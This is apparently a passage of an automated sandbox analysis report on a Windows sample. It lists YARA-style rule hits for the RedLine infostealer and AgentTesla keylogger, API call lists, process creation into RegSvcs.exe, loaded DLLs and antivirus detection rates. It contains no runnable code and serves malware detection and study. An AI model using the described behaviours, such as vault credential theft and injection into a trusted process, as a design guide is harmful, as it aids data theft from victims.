                  Source: 00000003.00000002.2197062876.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000000.00000002.2184230315.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000004.00000002.4657745464.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,3_2_004333BE
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0042200C0_2_0042200C
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0041A2170_2_0041A217
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004122160_2_00412216
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0042435D0_2_0042435D
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004033C00_2_004033C0
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004125E80_2_004125E8
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0044663B0_2_0044663B
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004096A00_2_004096A0
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004138010_2_00413801
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0042096F0_2_0042096F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004129D00_2_004129D0
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004119E30_2_004119E3
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0041C9AE0_2_0041C9AE
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0047EA6F0_2_0047EA6F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0040FA100_2_0040FA10
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0044EB5F0_2_0044EB5F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00423C810_2_00423C81
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00411E780_2_00411E78
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00442E0C0_2_00442E0C
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00420EC00_2_00420EC0
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0044CF170_2_0044CF17
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00444FD20_2_00444FD2
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00A836200_2_00A83620
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0042200C3_2_0042200C
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0041A2173_2_0041A217
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_004122163_2_00412216
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0042435D3_2_0042435D
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_004033C03_2_004033C0
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_004125E83_2_004125E8
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0044663B3_2_0044663B
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_004096A03_2_004096A0
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_004138013_2_00413801
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0042096F3_2_0042096F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_004129D03_2_004129D0
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_004119E33_2_004119E3
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0041C9AE3_2_0041C9AE
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0047EA6F3_2_0047EA6F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0040FA103_2_0040FA10
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0044EB5F3_2_0044EB5F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00423C813_2_00423C81
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00411E783_2_00411E78
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00442E0C3_2_00442E0C
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00420EC03_2_00420EC0
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0044CF173_2_0044CF17
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00444FD23_2_00444FD2
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_016836203_2_01683620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00408C604_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040DC114_2_0040DC11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00407C3F4_2_00407C3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00418CCC4_2_00418CCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00406CA04_2_00406CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004028B04_2_004028B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041A4BE4_2_0041A4BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004182444_2_00418244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004016504_2_00401650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402F204_2_00402F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004193C44_2_004193C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004187884_2_00418788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402F894_2_00402F89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402B904_2_00402B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004073A04_2_004073A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BDD9204_2_02BDD920
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BDCD084_2_02BDCD08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BD10304_2_02BD1030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02BDD0504_2_02BDD050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05D055384_2_05D05538
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05D089A84_2_05D089A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_05D018384_2_05D01838
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 44 times
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: String function: 0040E710 appears 44 times
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: String function: 00401B10 appears 50 times
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: String function: 00408F40 appears 38 times
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: String function: 004301F8 appears 36 times
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: String function: 004115D7 appears 72 times
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: String function: 00416C70 appears 78 times
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: String function: 004181F2 appears 42 times
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: String function: 00445AE0 appears 130 times
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: String function: 0041341F appears 36 times
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: String function: 00422240 appears 38 times
                  Source: juE8dtqPkx.exe, 00000000.00000003.2181560395.000000000414D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs juE8dtqPkx.exe
                  Source: juE8dtqPkx.exe, 00000000.00000002.2184230315.0000000002F60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb193d671-5b40-4d80-81d1-4185c1bd38cb.exe4 vs juE8dtqPkx.exe
                  Source: juE8dtqPkx.exe, 00000000.00000003.2181367670.0000000003FA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs juE8dtqPkx.exe
                  Source: juE8dtqPkx.exe, 00000003.00000003.2194571500.0000000003FF3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs juE8dtqPkx.exe
                  Source: juE8dtqPkx.exe, 00000003.00000002.2197062876.00000000016A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb193d671-5b40-4d80-81d1-4185c1bd38cb.exe4 vs juE8dtqPkx.exe
                  Source: juE8dtqPkx.exe, 00000003.00000003.2194279742.000000000419D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs juE8dtqPkx.exe
                  Source: juE8dtqPkx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 3.2.juE8dtqPkx.exe.16a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 4.2.RegSvcs.exe.2d706c6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.2d706c6.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.4126458.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.4126458.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.30a0ee8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.30a0ee8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.2d6f7de.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.2d6f7de.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.30a0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.30a0000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.2d6f7de.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.2d6f7de.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.30a0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.30a0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.4125570.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.4125570.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.4126458.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.4126458.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.4174790.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.4174790.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.54a0000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.54a0000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.54a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.54a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 4.2.RegSvcs.exe.4125570.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.4125570.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.juE8dtqPkx.exe.2f60000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 4.2.RegSvcs.exe.4174790.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.4174790.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.2d706c6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.2d706c6.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.RegSvcs.exe.30a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.30a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 00000003.00000002.2197062876.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 00000000.00000002.2184230315.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000004.00000002.4657745464.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@2/2
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,3_2_004333BE
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,3_2_00464EAE
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeFile created: C:\Users\user\AppData\Local\Temp\autE409.tmpJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCommand line argument: #v0_2_0040D6B0
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCommand line argument: #v3_2_0040D6B0
                  Source: juE8dtqPkx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: juE8dtqPkx.exeVirustotal: Detection: 38%
                  Source: juE8dtqPkx.exeReversingLabs: Detection: 63%
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeFile read: C:\Users\user\Desktop\juE8dtqPkx.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\juE8dtqPkx.exe "C:\Users\user\Desktop\juE8dtqPkx.exe"
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\juE8dtqPkx.exe"
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeProcess created: C:\Users\user\Desktop\juE8dtqPkx.exe "C:\Users\user\Desktop\juE8dtqPkx.exe"
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\juE8dtqPkx.exe"
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\juE8dtqPkx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeProcess created: C:\Users\user\Desktop\juE8dtqPkx.exe "C:\Users\user\Desktop\juE8dtqPkx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\juE8dtqPkx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeSection loaded: wininet.dllJump to behavior
